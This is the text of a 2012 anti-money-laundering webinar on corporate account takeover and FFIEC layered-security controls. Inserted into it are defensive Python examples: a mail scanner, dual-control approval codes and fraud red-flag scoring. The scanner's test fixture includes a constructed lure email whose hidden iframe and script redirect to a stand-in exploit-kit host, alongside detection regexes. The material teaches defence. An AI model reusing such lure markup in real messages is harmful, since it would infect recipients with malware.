www2.acams.org/webinars
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
COPYRIGHT NOTICE – USE OF WEBEX LOGIN/PASSWORD FOR ACAMS WEB SEMINARS
Each site license entitles the registrant to one login: one phone connection (if accessing audio via teleconference) and one Internet connection for simultaneous Webcast, in one room where an unlimited number of listeners may participate.
Providing your login instructions and password to another for their use, using your login ID/password more than once, or any simultaneous or delayed transmission, broadcast, re-transmission or re-broadcast of this event to additional sites/rooms by any means (including but not limited to the use of telephone conferencing services or a conference bridge, whether external or owned by the registrant) or recording is a violation of U.S. copyright law and is strictly prohibited.
Technical Assistance
• Send a message via the Q & A box
• Or call WebEx Technical Support: (US & Canada) 866-229-3239, (International) 916-229-3239
Attendee instructions on how to use Audio Broadcast
• Do not close the Audio Broadcast panel
• If you are not able to listen to the audio on your computer speakers, press the stop button, wait 5 seconds, then press play.
• Make sure to adjust the volume button on your computer speakers and also adjust the volume on your sound card. To do this, go to the Start Menu, click Control Panel, then click Sound & Audio Devices and adjust accordingly.
• If you do not have speakers, please refer to your login instructions for the Teleconference Domestic and International Numbers and Access Code.
• You may request the Teleconference Number by clicking “Request” under the attendee box on your left hand side.
Welcome to Today’s ACAMS Web Seminar
ACH/Wire and Online Banking Fraud: The Impetus Behind FFIEC’s Guidance for Layered Security
April 11, 2012, 12:00 Noon – 1:00 PM EDT
A sound check will be performed 5 minutes before the start time.
• Can you hear the sound check?
• It has begun
To send a question:
• Locate the Q & A box on the bottom right hand corner of the WebEx platform.
• Type in your question and click send!
Today’s Presenters
BRENDAN BROTHERS, Co-Founder, Verafin
• Co-founded Verafin (BSA/AML Compliance & Fraud Detection software company) in 2003
• Frequent speaker at industry conferences and key presenter for Verafin’s anti-financial crime thought leadership webinar series
• Verafin has more than 800 financial institution customers across North America
RICK MALTZ, Executive Vice President & Chief Risk Officer, Bangor Savings Bank
• Rick has over 29 years of experience in Banking, specializing in Risk Management, Information Security, Operations, Compliance and Internal Audit.
• Has been with Bangor Savings Bank for 13 years
• Oversees enterprise risk management, information & physical security, fraud management, compliance, BSA, credit policy, loan review, real estate valuation and legal
Today’s Agenda:
FFIEC Guidance on Internet Banking
Layered Security
Corporate Account Take Over
Processes, Controls & Best Practices to Combat Online Account Takeover
Overview of Changes in the 2011 Supplement
Guidance: Authentication in an Internet Banking Environment (2005)
Supplement to the Guidance (2011)
Small and midsize businesses are frequent targets
Despite expectation for periodic risk assessments, examiners reported that some FIs have not done so
Agencies needed to reemphasize and clarify control expectations
Supplement has more specificity:
New expected minimum control levels
Certain controls no longer considered effective as primary
Since 2005, threats have become more sophisticated, effective, and malicious
Key Highlights of the Guidance Supplement
Guidance: Authentication in an Internet Banking Environment
Layered Security
Different controls at different points, so a weakness in one is compensated for by strengths in another
Agencies expect “layered security” for all accounts classified as “high-risk” under FFIEC guidance
a classic child’s toy illustrates very simply the concept of layered security…
when a financial criminal moves beyond one layer of security… they encounter a further layer
layered security in the banking world…
“The institution with complementary layered technologies is akin to the house with a high fence, a big guard dog in the yard, and a burglar alarm inside. This provides multiple opportunities to catch the bad guys in the act, and encourages the criminals to go in search of easier prey.”
Source: Aite Group, 2011
Examples of Security Layers
the deeper the defense – the stronger the protection
Security Layers:
• tokens
• customer education & awareness
• customer agreements
• secure browser plug-in
• image & challenge questions
• strong passwords
• backend analytics
• TMS fraud services
• out of band authorization
• associate education & awareness
• commercial dual controls
overt controls and invisible controls…
“When constructing a layered security program, strike a balance between overt controls (such as stronger authentication practices) and invisible controls (such as fraud detection and monitoring). Flashing lights and alarms may work well to scare thieves away, but invisible alarms that call the police are more effective at catching a thief.”
Source: Bank Systems and Technology, 2011
A Framework for Fraud Protection
A layered security system affords the best protection, since no single layer is sufficient to stop determined bad actors from penetrating enterprise systems.
Source: Gartner, 2011
Layer 1: Endpoint-Centric. Secure browsing, OOB authentication and transaction verification; endpoint device identification, mobile location services
Layer 2: Navigation-Centric. Analyzes session behavior and compares it to what is expected
Layer 3: User and Account-Centric for a Specific Channel. Monitors and analyzes user and account behavior, and identifies anomalous behavior
Layer 4: User and Account-Centric Across Multiple Channels and Products. Monitors and analyzes user and account behavior across channels, and correlates alerts for each entity across channels and products
Layer 5: Pattern-Based Intelligence. Enables the analysis of relationships among internal and/or external entities and their attributes (e.g., users, accounts, machines)
Source: Gartner, 2011
transaction-level security…
“Creators of malware are innovative and nimble, and have proven to be effective at compromising security strategies that do not incorporate transaction-level security. Effective, efficient detection of anomalies, especially those related to transaction activity, requires sophisticated behavior analytics. The key to effective protection against sophisticated attacks is transaction-level security that can profile behavior at the user level, and can send alerts for out-of-pattern behavior.”
Source: Aite Group, 2011
Corporate Account Takeover: The Risk Is A Reality
Cyberthieves have cost US companies and their banks more than $15bn in the past five years, the Federal Deposit Insurance Corporation found in a recent study.
Source: Financial Times, 2012
What is Corporate Account Takeover?
A fast growing electronic crime where thieves typically use some form of malware to obtain login credentials to Corporate Online Banking accounts and fraudulently transfer funds from the account(s)
Payments used to commit the crime:
• Domestic and International Wire Transfers
• Business‐to‐Business ACH Payments
• Online Bill Pay
• Electronic Payroll
Five Major Aspects of the Crime
Recruitment – Utilize Command & Control network to recruit Money Mules and target victim companies
Target – Small to midsized business and organizations
Infiltration – Attackers utilize numerous tactics to gain access to your network or computer, Banking Trojans
Exfiltration – Transferring electronic funds out of your account(s) through coordinated effort
Money Mules – Victims or Suspects/Money laundered
How the Takeover Happens
Criminals target victims by scams
Victim unknowingly installs software by clicking on a link or visiting an infected Internet site
Fraudsters begin monitoring the accounts
Victim logs on to their Online Banking
Fraudsters collect login credentials
Fraudsters wait for the right time and then, depending on your controls:
• they either log in after hours
• or, if you are using a token, they wait until you enter your code and then hijack the session and send you a message that Online Banking is temporarily unavailable
Sample Corporate Account Takeovers and Losses
Pennsylvania School District ‐ $450,000
New York School District ‐ $500,000
Experi‐Metal ‐ $550,000
PATCO ‐ $358,000
Hillary Machinery ‐ $229,000
Illinois Town ‐ $70,000
Marian College ‐ $189,000
Sand Springs School ‐ $80,000
Sycamore County Schools ‐ $300,000
Village View Escrow ‐ $465,000
Catholic Diocese of Des Moines ‐ $600,000
Town of Pittsford, NY ‐ $139,000
Steuben Arcs ‐ $158,000
St. Isidore’s Catholic Church ‐ $87,000
Two Trucking Companies ‐ $115,000
MECA ‐ $217,000
The FBI estimates Corporate Account Takeover could cost American companies as much as $1,000,000,000 in 2011 alone.
FBI currently investigating over 400 cases of corporate account takeovers in which criminals initiated unauthorized ACH and wire transfers from bank accounts of U.S. businesses.
In one 2011 wire fraud case, the Zeus Trojan and keylogging compromised businesses’ login credentials and wired $11 million to China.
Source: ACH Alert
Risk Management of Corporate Account Takeover
Blueprint for a Risk Management Framework: Corporate Account Takeover (CATO)
CATO Three-Part Framework
Protect: Implement processes and controls to protect the financial institution and corporate customers.
Detect: Establish monitoring systems to detect electronic theft and educate employees and customers on how to detect a theft in progress.
Respond: Prepare to respond to an incident as quickly as possible (measured in minutes, not hours) to increase the chance of recovering the money for your customer.
19 Recommended Processes and Controls
Best Practices (outlined for each of the nineteen recommended processes and controls)
Example Best Practice
Educate bank employees of warning signs that a theft may be in progress.
Red Flags of a possible takeover
Configuration Changes to Cash Management/Online Banking Profiles
New user accounts added
New ACH batches or wire templates with new payees
Changes to personal information
Disabling or changing notifications
Changes to the online account access profile
Unusual Customer Activity
Unfamiliar IP log‐on address (especially if a foreign IP address)
Unusually small transaction amounts (example: $1.00 ACH, bill pay, or other transactions, especially if made at an unusual time of day)
Unusual (non‐typical) transfer of funds, especially if out of the bank; one‐time bill pay to new payees
ACH or wires to new payees or receivers and/or with unusual amounts
Changes to the account and routing numbers of existing payees, not just a new payee name
Unusual timing of transactions (based on the established transaction schedule of the corporate customer, or random transactions submitted between traditional transactions)
Larger than usual transactions
Overseas transfers
Full List of Best Practices
www.ectf.dob.texas.gov (see “Recommendations”)
Some Closing Thoughts to Ponder…
Survey results of 533 senior‐level executives in small and medium businesses across the United States
Source: Ponemon Institute, 2011
Startling Statistics
70% believe their banking institution is ultimately most responsible for ensuring their online accounts are secure
61% believe that only one successful fraud involving online bank accounts could destroy their trust
85% say they would transfer their business to another bank
Source: Ponemon Institute, 2011
Online Banking Fraud
FFIEC’s Guidance on Authentication in an Internet Banking Environment
Rick Maltz, Executive Vice President & Chief Risk Officer
FFIEC – Supplement to Authentication in an Internet Banking Environment (2011)
Clearly Places More Responsibility on Banks:
Requires annual risk assessments
Authentication consistent with the level of risk
Layered security must be considered
Must have practices to Detect & Respond to Suspicious Activity
Customer education & awareness
Why is this Important?
Is this your Risk Management Program?
Does your Bank want to lose money?
Do you think your customers care whose fault it is?
Consumer Liability
Under existing regulations, the Consumer liability is extremely limited:
Generally $50, but may be $500 or unlimited if Bank is not notified timely
Visa/MasterCard, generally $0, if Bank is notified after 2 business days of discovery
Basically, the Bank eats it all!
Business Liability - Under Uniform Commercial Code
For Internet transactions, the business is liable for unauthorized transfers if:
The Bank can prove that the transaction was processed in good faith, and
The Bank provided, and complied with, a commercially reasonable security procedure
Challenges to UCC standards
Banks are being sued for losses due to:
Failed or weak security practices
Ineffective monitoring
Should the car dealer be liable for this? If you… get hurt because you decided not to wear your seatbelt?
Both the Bank & Business Can and Will Lose Money!
Threat Environment
Organized Global Crime
Criminals making investments in people & technology just like normal businesses
Sanctioned in some countries for economic benefit
Can be related to terrorist financing
Money Laundering key to successful fraud activities
Threat complexity is overwhelming traditional defenses
Threat Environment
Criminals know that most small businesses don’t:
Always use Bank security features,
Monitor & reconcile accounts, or
Have resources to protect data & systems
Threat Landscape
Fraud, Data Loss and Identity Theft continue to frustrate Banks & Customers
Traditional Threats:
Credential Theft by:
Phishing
Vishing
Smishing
Significant Threat: Malware
Malicious Software, designed to infiltrate a computer system without the owner’s informed consent
Malware Trends (Source: Symantec Intelligence Report)
Simple Email Statistics (source: Symantec Intelligence Report, February 2012)
Estimated total number of global e-mail messages:
1.3 trillion messages in Feb 2012
or
43.1 billion email messages per day
which translates to:
almost 500,000 per second
Spam Email (source: Symantec Intelligence Report, February 2012)
If 68% of all e-mail was considered spam in February, then:
29.4 billion spam emails per day
or
roughly 340,000 per second
Malicious Email (source: Symantec Intelligence Report, February 2012)
One in every 358 emails was a phishing scam
At 43.1 billion emails per day, that is roughly 120 million phishing emails per day, or about 3.6 billion per month
One in every 274 emails contained malware
That is roughly 157 million emails with malware per day, or about 4.7 billion per month
Threat: “Drive by E-mails”
Instant infection threat:
Infects users who simply view a message, or possibly just glance at it in a preview window
New generation of e-mail-borne malware consists of HTML e-mails containing JavaScript that automatically downloads malware
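One mechanical check against the vector described above is to scan the HTML part of every inbound message for active or auto-loading content before it can reach a preview pane. The Python example below is added here for illustration; it is not code from the page, from the presenters, or from Symantec. The two sample messages are constructed, and the pattern list is an assumption: it catches the script, frame and refresh vectors the slide describes, not every obfuscation, and a mail client that never executes script in HTML mail is not exploited by a script tag alone.

```python
import re
from email import message_from_string, policy
from email.message import EmailMessage

# Markers of active or auto-loading content in HTML mail. This list is an
# assumption for the example: it covers the drive-by vector (script run on
# render, frames/objects and refreshes that pull a remote resource).
ACTIVE_CONTENT_PATTERNS = [
    ("script", re.compile(r"<\s*script\b", re.I)),
    ("iframe", re.compile(r"<\s*(iframe|frame|object|embed)\b", re.I)),
    ("javascript_url", re.compile(r"javascript\s*:", re.I)),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("meta_refresh", re.compile(r"<\s*meta[^>]+http-equiv\s*=\s*['\"]?refresh", re.I)),
]


def active_content_findings(raw_message: str) -> list[str]:
    """Parse a raw RFC 5322 message and return the names of the active-content
    markers found in any text/html part (an empty list means nothing found)."""
    msg = message_from_string(raw_message, policy=policy.default)
    found: list[str] = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        html = part.get_content()  # decoded body, whatever transfer encoding was used
        for name, pattern in ACTIVE_CONTENT_PATTERNS:
            if name not in found and pattern.search(html):
                found.append(name)
    return found


def build_sample(subject: str, plain: str, html: str) -> str:
    """Assemble a multipart/alternative message as raw text (constructed sample data)."""
    msg = EmailMessage()
    msg["From"] = "accounts@example.com"
    msg["To"] = "treasurer@example.com"
    msg["Subject"] = subject
    msg.set_content(plain)
    msg.add_alternative(html, subtype="html")
    return msg.as_string()


# Constructed samples: an ordinary invoice notice and a lure whose HTML part
# carries a hidden frame plus a script that redirects to a hypothetical exploit kit.
BENIGN = build_sample(
    "Invoice 4471",
    "Your invoice is attached.",
    "<html><body><p>Your invoice is attached.</p></body></html>",
)
DRIVE_BY = build_sample(
    "ACH transfer rejected",
    "See the HTML version of this message.",
    "<html><body><p>Your ACH transfer was rejected.</p>"
    '<iframe src="http://update.example.invalid/kit.php" width="1" height="1"></iframe>'
    "<script>window.location='http://update.example.invalid/kit.php';</script>"
    "</body></html>",
)

if __name__ == "__main__":
    for label, raw in (("benign", BENIGN), ("drive-by", DRIVE_BY)):
        print(label, active_content_findings(raw))
```

The check runs on the decoded part, so base64 or quoted-printable transfer encoding does not hide the markup; what it cannot see is script assembled at render time or loaded through a plain image reference, which is why the slide's other layers (patching the client, blocking preview-pane rendering of HTML) still matter.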
Traditional defenses are no longer effective by themselves:
Multi-Factor or Strong Authentication
Challenge Response Questions
Virus Protection, Firewalls
Why is compliance with the guidance important?
Because it makes sense!
What Can Banks Do?
Not Going to Work!
Leverage Current Investments
Leverage Personnel
BSA/AML Analysts
• Already reviewing data for suspicious activity
• Trained to spot certain behavior
• Investigations
• Filing SARs
Fraud & Information Security Analysts
• Already reviewing data for suspicious activity
• Trained to spot certain behavior
• Investigations
• Filing SARs
Learn to Share Intelligence Internally
Leverage Technology Investments
Consolidate technology where practical
• Wire & ACH Monitoring
• Monitoring of log-on anomalies
• AML
• Debit Card fraud
• Check Fraud
• Case Management & SAR filing
Practice Defense in Depth
Control: Out-of-Band Authentication
Enhanced Multi-Factor Authentication
1. User logs in with their Username and Password (something you know)
2. User is prompted to select a channel for delivery of a One Time Password (OTP) (something you have *)
Login Code: 351073
Because of multi-factor authentication, a fraudster cannot independently log in to a user account.
• Fraudster would need to know username/password AND have the user’s phone. *
A login-time OTP proves possession only at login; malware that hijacks the authenticated session afterwards (the token scenario under “How the Takeover Happens”) is addressed by the transaction verification control that follows.
Control: Transaction Verification
Require secondary approval of transactions or key changes with an OTP
Transaction OTP requires a second individual to verify the EFT.
• In a separate out-of-band channel, the User sees the transaction detail and amount
• Unless verified with the OTP, the EFT will not go through
Example message:
Payment
To: Bob, Account #12345
Amount: $100.00
Access Code: 46548
Control: Callbacks
Bank will call to verify whether a transaction is authentic:
The call should go to someone other than the person who initiated the transaction
Call should be confirmed by a “PIN”
Callbacks are effective as they provide true “out of band” authentication.
They protect against both internal & external fraud
Control: Browser-based control
Control: Separation of Duties
Configure one account with permission to initiate a funds transfer
Configure a secondary account to approve the transfer
User A initiates EFT; User B approves EFT
By separating the capabilities in this way, you prevent a scenario where one account can transfer funds independently.
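The transaction verification and separation-of-duties controls above combine into what the Aite quote earlier calls transaction-level security: a second person approves, and the approval code is bound to the payee and amount that the approver independently confirms, so a man-in-the-browser that rewrites the submitted transaction (the session-hijack scenario under “How the Takeover Happens”) produces a code the bank rejects. The Python example below is added here to illustrate that; it is not code from the page or from either presenter’s institution. The per-user device secrets, the HMAC-based code derivation, the status strings and all user and payment data are constructed assumptions.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Optional


@dataclass
class Payment:
    payment_id: str
    initiator: str
    payee_name: str
    payee_account: str
    amount_cents: int
    approved_by: Optional[str] = None


def transaction_code(device_secret: bytes, payment_id: str, payee_account: str,
                     amount_cents: int, digits: int = 6) -> str:
    """Derive a short code bound to the payee account and amount.

    Assumption: each approver's phone or token shares `device_secret` with the
    bank and derives the code from details the approver confirms, never from the
    browser session. Truncation follows the HOTP construction (RFC 4226) applied
    to an HMAC over the transaction fields instead of a counter."""
    message = f"{payment_id}|{payee_account}|{amount_cents}".encode()
    mac = hmac.new(device_secret, message, hashlib.sha256).digest()
    offset = mac[-1] & 0x0F
    value = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return f"{value % 10 ** digits:0{digits}d}"


class PaymentService:
    """Bank-side release logic: dual control plus a transaction-bound code."""

    def __init__(self, device_secrets: dict[str, bytes]):
        self.device_secrets = device_secrets
        self.pending: dict[str, Payment] = {}
        self.released: list[Payment] = []

    def initiate(self, payment: Payment) -> None:
        # Whatever the browser submitted is what gets stored, malware edits included.
        self.pending[payment.payment_id] = payment

    def oob_challenge(self, payment_id: str) -> str:
        """Text pushed over the out-of-band channel: the details the bank actually holds."""
        p = self.pending[payment_id]
        return (f"Payment {p.payment_id} to {p.payee_name}, account {p.payee_account}, "
                f"amount ${p.amount_cents / 100:,.2f}. Reply with the code from your device.")

    def approve(self, approver: str, payment_id: str, code: str) -> str:
        p = self.pending[payment_id]
        if approver == p.initiator:
            return "rejected_dual_control"          # initiator may not approve own transfer
        expected = transaction_code(self.device_secrets[approver], p.payment_id,
                                    p.payee_account, p.amount_cents)
        if not hmac.compare_digest(expected, code):
            return "rejected_code_mismatch"         # code was not derived from these details
        p.approved_by = approver
        self.released.append(self.pending.pop(payment_id))
        return "released"


def run_scenarios() -> dict:
    # Constructed secrets and users; a real deployment provisions these per device.
    secrets_by_user = {"alice": b"alice-device-secret", "bob": b"bob-device-secret"}
    bank = PaymentService(secrets_by_user)

    # 1. Legitimate dual-control release: Alice initiates, Bob approves.
    bank.initiate(Payment("P-1001", "alice", "Bob's Supply", "12345", 10_000))
    code = transaction_code(secrets_by_user["bob"], "P-1001", "12345", 10_000)
    legit = bank.approve("bob", "P-1001", code)

    # 2. The initiator tries to approve her own transfer with a valid code.
    bank.initiate(Payment("P-1002", "alice", "Bob's Supply", "12345", 10_000))
    code = transaction_code(secrets_by_user["alice"], "P-1002", "12345", 10_000)
    self_approval = bank.approve("alice", "P-1002", code)

    # 3. Man-in-the-browser: Alice's screen shows account 12345, but the request
    #    that reached the bank names a mule account. Bob's device derives its code
    #    from the details Bob confirms (12345, $100.00), so the code does not match.
    bank.initiate(Payment("P-1003", "alice", "Bob's Supply", "99999", 10_000))
    code = transaction_code(secrets_by_user["bob"], "P-1003", "12345", 10_000)
    mitb = bank.approve("bob", "P-1003", code)

    return {"legit": legit, "self_approval": self_approval, "mitb": mitb,
            "released": [p.payment_id for p in bank.released],
            "challenge": bank.oob_challenge("P-1003")}


if __name__ == "__main__":
    for key, value in run_scenarios().items():
        print(f"{key}: {value}")
```

The design point is that the code is derived from details shown on the out-of-band channel or keyed into a token, never from what the browser reports, and that the out-of-band message carries the details the bank actually holds, so in scenario 3 the approver also sees the mule account number and has a second chance to stop the transfer.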
Control: Separation of PCs
Use separate PCs:
One PC to initiate a funds transfer
One PC to approve a funds transfer
Don’t allow other Internet activity
User A initiates EFT; User B approves EFT
By isolating the PCs in this way, you reduce the risk that malware can infect both machines and steal information
Control: Strong Passwords
A well-chosen password is easy to remember, but hard to guess.
Length: Minimum 8 characters
Complexity: Combination of mixed case letters, numbers, and special characters.
Periodically change password
Do not share passwords
A few of the common things to avoid in your password:
• User ID, family member or name, pet name, address, birth dates, SSN, account #, phone #
Control: Malware protection, Patching, and Firewalls
Anti-Virus, Anti-Spyware: Install and ensure virus protection and security software are updated regularly
Patching: Ensure security patches are applied to both OS and applications (Microsoft, Adobe, Java, etc.)
Firewall (corporate & desktop): Install a dedicated, actively managed firewall. Firewalls limit the potential for unauthorized access to a network and computers
Control: Transaction Alerting
• User makes a change
• User is instantly alerted of the change
Payee Added: Bob, Account #12345
It is impossible to prevent attacks on insecure client PCs. Transaction alerting exposes the results of transactions to the user, who then can take appropriate action.
• User is notified when important changes are made
• If alerted of a change they did not make, users will naturally contact the FI
Control: Monitor for Unusual Activity
Look for event anomalies associated with:
Logon activity
Changes in user profiles, customer setup
IP addresses not associated with your corporation
Transactions not consistent with customer’s behavior
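The red flags listed earlier (configuration changes to online banking profiles, unusual customer activity) and the anomaly categories on this slide can be checked mechanically against a per-customer baseline. The Python example below is added for illustration and is not code from the page or from either presenter’s institution. The customer profile, the thresholds (a micro-transaction is $5.00 or less, an unusual amount is more than three times the baseline maximum, business hours are 07:00 to 18:59 in the customer’s local time), the event field names and the event records are all constructed assumptions; a real deployment would learn the baseline from history and route the flags into case management rather than print them.

```python
import ipaddress
from datetime import datetime

# Constructed baseline for one corporate customer. In practice this is learned
# from the customer's history; the values here are assumptions for the example.
PROFILE = {
    "corporate_networks": [ipaddress.ip_network("203.0.113.0/24")],   # documentation range
    "business_hours": (7, 19),                                         # logins expected 07:00-18:59 local
    "known_payees": {"Acme Supply": "11110000", "Payroll Co": "22220000"},
    "baseline_max_cents": 250_000,                                     # largest payment in the baseline period
}
MICRO_CENTS = 500          # "$1.00 test" transactions and similar
UNUSUAL_MULTIPLE = 3       # flag amounts above 3x the baseline maximum


def _after_hours(ts: str, profile) -> bool:
    start, end = profile["business_hours"]
    hour = datetime.fromisoformat(ts).hour   # timestamps assumed to be customer-local
    return not (start <= hour < end)


def _unfamiliar_ip(ip: str, profile) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in profile["corporate_networks"])


def check_login(ev, profile) -> list[str]:
    flags = []
    if _unfamiliar_ip(ev["ip"], profile):
        flags.append("unfamiliar_ip")
    if _after_hours(ev["time"], profile):
        flags.append("after_hours")
    return flags


def check_profile_change(ev) -> list[str]:
    """Configuration changes are the red flags that precede the theft itself."""
    field = ev["field"]
    if field == "notifications" and ev.get("new") == "disabled":
        return ["notifications_disabled"]
    if field == "payee_account":
        return ["payee_account_changed"]
    if field == "user_added":
        return ["new_user_added"]
    return [f"profile_change:{field}"]


def check_payment(ev, profile) -> list[str]:
    flags = []
    known_account = profile["known_payees"].get(ev["payee"])
    if known_account is None:
        flags.append("new_payee")
    elif known_account != ev["account"]:
        flags.append("payee_account_mismatch")   # familiar name, different account number
    if ev["amount_cents"] <= MICRO_CENTS:
        flags.append("micro_transaction")
    if ev["amount_cents"] > UNUSUAL_MULTIPLE * profile["baseline_max_cents"]:
        flags.append("unusual_amount")
    if ev.get("international"):
        flags.append("international")
    if _after_hours(ev["time"], profile):
        flags.append("after_hours")
    return flags


CHECKS = {
    "login": lambda ev, p: check_login(ev, p),
    "profile_change": lambda ev, p: check_profile_change(ev),
    "payment": check_payment,
}


def score_events(events, profile=PROFILE) -> dict[str, list[str]]:
    """Return {event_id: [flags]} for every event that raised at least one flag."""
    out = {}
    for ev in events:
        flags = CHECKS[ev["type"]](ev, profile)
        if flags:
            out[ev["id"]] = flags
    return out


# Constructed event stream: one normal day with a takeover attempt overnight.
SAMPLE_EVENTS = [
    {"id": "e1", "type": "login", "ip": "203.0.113.25", "time": "2012-04-11T09:15:00"},
    {"id": "e2", "type": "login", "ip": "198.51.100.7", "time": "2012-04-11T02:40:00"},
    {"id": "e3", "type": "profile_change", "field": "notifications", "old": "enabled", "new": "disabled"},
    {"id": "e4", "type": "profile_change", "field": "payee_account", "payee": "Acme Supply",
     "old": "11110000", "new": "99990000"},
    {"id": "e5", "type": "payment", "payee": "Acme Supply", "account": "11110000",
     "amount_cents": 100, "international": False, "time": "2012-04-11T02:45:00"},
    {"id": "e6", "type": "payment", "payee": "QuickCash Ltd", "account": "77770000",
     "amount_cents": 4_500_000, "international": True, "time": "2012-04-11T02:50:00"},
    {"id": "e7", "type": "payment", "payee": "Payroll Co", "account": "22220000",
     "amount_cents": 180_000, "international": False, "time": "2012-04-11T10:00:00"},
    {"id": "e8", "type": "payment", "payee": "Acme Supply", "account": "99990000",
     "amount_cents": 240_000, "international": False, "time": "2012-04-11T10:05:00"},
]

if __name__ == "__main__":
    for event_id, flags in score_events(SAMPLE_EVENTS).items():
        print(event_id, ", ".join(flags))
```

Each flag on its own is weak; the value is in the sequence the slide’s red flags describe (after-hours login from an unfamiliar address, notifications disabled, a $1.00 test payment, then a large international transfer to a new payee), so the output is meant to feed the same case management and analyst review the earlier “Leverage Current Investments” slides describe.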
Control: Customer Contracts
Evaluate customer contracts:
Clearly define security procedures
Define customer’s responsibility
Provide educational material
Do not allow “Opt Out”
Educate your customers:
Prevention is a Partnership
Risk Problem – Van has rolled over the edge
Risk Solution – Lift it with a crane
Risk Monitoring: Going well so far……..
Ooooops……..New Risk Problem
Traditional Thinking – Get A Bigger Crane
Result of Traditional Thinking….Who cares!
If you continue to think inside of the box, you will lose $
Q&A
• Locate the Q & A box on the bottom right hand corner of the WebEx platform.
• Type in your question and click send!
If you have suggestions for future web seminars or
additional questions for today’s experts, please send them to:[email protected]
Thank you for joining us today!
Next Web Seminar: AML Audit (Part I): Demystifying the AML Audit Discovery Phase—Preparing for the Pre-Visit
April 18, 2012 – Noon to 2:00 PM EDT